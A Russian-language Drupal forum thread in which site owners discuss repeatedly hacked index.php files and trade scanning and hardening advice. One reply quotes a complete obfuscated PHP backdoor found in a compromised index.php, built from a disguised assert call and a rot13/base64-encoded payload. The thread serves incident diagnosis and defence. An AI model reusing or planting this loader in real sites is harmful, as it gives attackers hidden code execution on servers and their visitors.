Ломают сайты: переписывают index.php

Главные вкладки

Аватар пользователя Divan Tapir Divan Tapir 10 октября 2015 в 20:01

Зачастую ломают сайт, причем довольно "бережно". Только заменяют содержимое index.php. Причем первый прецедент был довольно давно, сейчас за неделю 2 случая. Права на файл 644. С чего начать, как проанализировать, где находится дыра в безопасности? Может ли быть поломан фтп? Если он поломан, то почему только index.php меняют, а не делают более сложные махинации?

Комментарии

Аватар пользователя Divan Tapir Divan Tapir 10 октября 2015 в 22:07

Александр_Броневой. Элементарно, при входе на сайт страница совсем другая. Бангладеш Тим вроде Smile фтп работает через pure_ftp, пароли хранятся в MySQL, там они даже не шифруются.

Аватар пользователя Divan Tapir Divan Tapir 11 октября 2015 в 8:09

Вы имеете в виду, что вот создаю я фтп-соединения и забиваю туда данные для коннекта, то есть там пароль не следует хранить? Дурень я, что могу сказать. До меня так работали и меня так научили. Sad

Аватар пользователя Александр_Броневой Александр_Броневой 10 октября 2015 в 23:51

"Divan Tapir" wrote:
Элементарно, при входе на сайт страница совсем другая.

Ну это повезло.Нормальный хакер так бы взломал,что вы бы и не заметили.Это было бы страшнее.А так писюк какой то балуется.Восстановить сайт из бекапа и освежить весь сервак,пароли сменить,переустановить желательно сервер с новыми данными.
А если вы еще и пороли сохраняете тогда вас грех не наказать

Аватар пользователя Divan Tapir Divan Tapir 11 октября 2015 в 7:58

Еще раз говорю, весь фтп работает на pure-ftp c использованием бд, то есть логины и пароли там хранятся, все бы ничего, но меня удивляет, что там пароли в незашифрованном виде хранятся, вся ВДСка была настроена еще до меня. А так все данные хрнаятся локально. Доступа к ним нет.

Аватар пользователя Orion76 Orion76 11 октября 2015 в 12:12

FTP и безопасность - несовместимые вещи..
логин-пароль (да и сами данные) передаются по сети в открытом виде(не зашифрованные)..
троян на компе или маршрутизаторе, сниффер в локальной сети и т.п., и ваши пароли уплыли..

SSH - и голова не болит..

Аватар пользователя ttenz ttenz 11 октября 2015 в 14:25

"Divan Tapir" wrote:
С чего начать, как проанализировать, где находится дыра в безопасности?

о, кажись, моя тема )

Divan Tapir, прогони манулом (https://yandex.ru/promo/manul/#about) + https://www.drupal.org/project/hacked + https://www.drupal.org/project/security_review + https://www.drupal.org/project/drupalgeddon + https://www.drupal.org/project/site_audit.

результат сюда. там дальше можно думать.

Аватар пользователя sasha_gar sasha_gar 11 октября 2015 в 20:47

да че думать. движок обновляй да пользователей подозрительных вычищай. не сделаешь за бангладешом x-sec team подтянется с роликом о тяжелой жизни в сирии и что асад тиран. песня завораживающая. на слезу пробмвает

Аватар пользователя Divan Tapir Divan Tapir 12 октября 2015 в 5:20

Пока что могу сказать: в xferlog ничего нет, только моя работа отображается. Буду пробовать, как говорит господин ttenz. Hacked у меня стоит довольно давно.

Аватар пользователя Divan Tapir Divan Tapir 12 октября 2015 в 12:27

У меня проверка манулом зависла на проверке локального репозитория гита =/ причем конкретно так, уже часа 3-4 висит на нем.

Аватар пользователя ttenz ttenz 12 октября 2015 в 16:05

"Divan Tapir" wrote:

У меня проверка манулом зависла на проверке локального репозитория гита =/ причем конкретно так, уже часа 3-4 висит на нем.

ок, пропускай. тогда давай со 2 пункта.

Гугл ещё не сообщил о взломе?, если нет, то время ещё есть, а то понизит или выкинет из поиска.

Аватар пользователя deb deb 12 октября 2015 в 16:34

"Divan Tapir" wrote:

У меня проверка манулом зависла на проверке локального репозитория гита =/ причем конкретно так, уже часа 3-4 висит на нем.

На кой хрен вам какие-то манулы если есть гит? git status и всё как бы.

Аватар пользователя Divan Tapir Divan Tapir 13 октября 2015 в 7:40

git status мне ничего не дал, Итак, какую инфу дал мне Hacked:
1) В ядре ничего не обнаружил.
Измененные файлы:

  • sites/default/default.settings.php
  • sites/all/modules/README.txt
  • sites/all/themes/README.txt
  • sites/example.sites.php
  • robots.txt
  • .htaccess
  • cron.php

Все изменения были сделаны довольно давно, перепроверил, ничего подозрительного не обнаружил.
2) Дальше список измененных модулей и их файлов:
Chaos tool suite (ctools) 7.x-1.0:

  • css/modal.css

IMCE 7.x-1.5

  • tpl/imce-page.tpl.php

Vote Up/Down 7.x-1.0-alpha1

  • widgets/thumbs/thumbs.png
  • widgets/thumbs/thumbs.css
  • widgets/thumbs/widget.tpl.php

Wysiwyg 7.x-2.1

  • editors/tinymce.inc
  • wysiwyg-dialog-page.tpl.php

У всех файлов изменения датируются 2012-2013 годами. Пересмотрел все, ничего там нет. Пока пробую security_review.

Аватар пользователя Divan Tapir Divan Tapir 13 октября 2015 в 9:14

Вот что обнуружил: tmp/hacked-cache-root/hackedProjectWebFilesDownloader/ ну и весь tmp завален подобным, я его удалил, почему гит его не обнаружил, пока не ясно.

Аватар пользователя ttenz ttenz 13 октября 2015 в 11:03

"Divan Tapir" wrote:
почему гит его не обнаружил, пока не ясно

почему и не люблю гит в этом плане, подозреваю, что она была в исключениях.

интересно бы посмотреть содержимое файла index.php (код)

Аватар пользователя Divan Tapir Divan Tapir 13 октября 2015 в 11:03

Ну он сразу же в первую очередь был вычищен мною. Просто надо было хоть сделать видимость, что сайт не поломан. Естественно, что там до кучи всего было напихано. Сейчас там стандартный код:

<?php

define

('DRUPAL_ROOT'getcwd());
require_once 
DRUPAL_ROOT '/includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);
menu_execute_active_handler();?>
Аватар пользователя ttenz ttenz 13 октября 2015 в 11:08

"Divan Tapir" wrote:
он сразу же в первую очередь был вычищен мною

понятно. возможно там были указания к каким папкам он обращается. ну да ладно, делай 4,5 шаг. уверен, что пароли ты везде сменил и запомнил в памяти своего разума, но не в компе и проверил права на tmp, если она тебе нужна, надеюсь что, не 777.

что за хостинг?

Аватар пользователя deb deb 13 октября 2015 в 11:19

"Divan Tapir" wrote:
Вот что обнуружил: tmp/hacked-cache-root/hackedProjectWebFilesDownloader/ ну и весь tmp завален подобным, я его удалил, почему гит его не обнаружил, пока не ясно.

Судя по всему это кэш модуля hacked.

Аватар пользователя Divan Tapir Divan Tapir 14 октября 2015 в 9:07

ttenz, sprinhost, но там VDS'ка. Настройкой сервера я не занимался, да я и не имею сильных познаний в этой области. До меня человек работал.

Аватар пользователя Divan Tapir Divan Tapir 14 октября 2015 в 11:27

Решил для фтп оставить только папку с темой: перенес домашнюю дерикторию фтп из корня сайта и сделал симлинк на папку с темой сайта.

Аватар пользователя TV-Child TV-Child 15 октября 2015 в 23:36

Не стал пока создавать новую тему. Очень похожий случай. Заметил, что сайт стал грузиться раз на пятый-седьмой. Посещалово упало на 40%. Посмотрел, а в корневой папке сайта добавился файл "ch" без расширения в котором, при открытии его нотпадом написано "windows-1251". И файл index.php имеет ту же дату модификации, что и дата создания файла "ch". Дата изменения/создания файлов примерно совпадает с началом глюков на сайте (вчера вечером все было норм, сегодня вечером глючит, файлы созданы прошедшей ночью).
Сравнил содержание бэкапного индекс пхп и нового. Обнаружил интересную вставочку:

<?php
//###==###
error_reporting(0); 
$strings "as";$strings .= "sert";
@
$strings(str_rot13('riny(onfr64_qrpbqr("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"));'));
//###==###?>

Вот такие дела. Пока что исправил последствия, удалив "ch" и заменив индекс.пхп на бэкапный. Еще не разобрался, где дыра, как латать и есть ли еще места, где хакер порылся.

Версия ядра 6.35
Версия CCK 6.2.8

Аватар пользователя ttenz ttenz 22 октября 2015 в 6:24

"Divan Tapir" wrote:

Сменил все пароли

все таки посоветую правильно настроить сервер - http://saitodelatel.ru/nastroyka-servera-nginx-s-konfiguraciey-perusio-p... (там на примере нестабильного дистрибутива, сейчас уже можно на стабильном самом новом)

у меня такое было, поменяю пароли всё тихо, потом опять, в самое неподходящее время, пока правильно не настроил.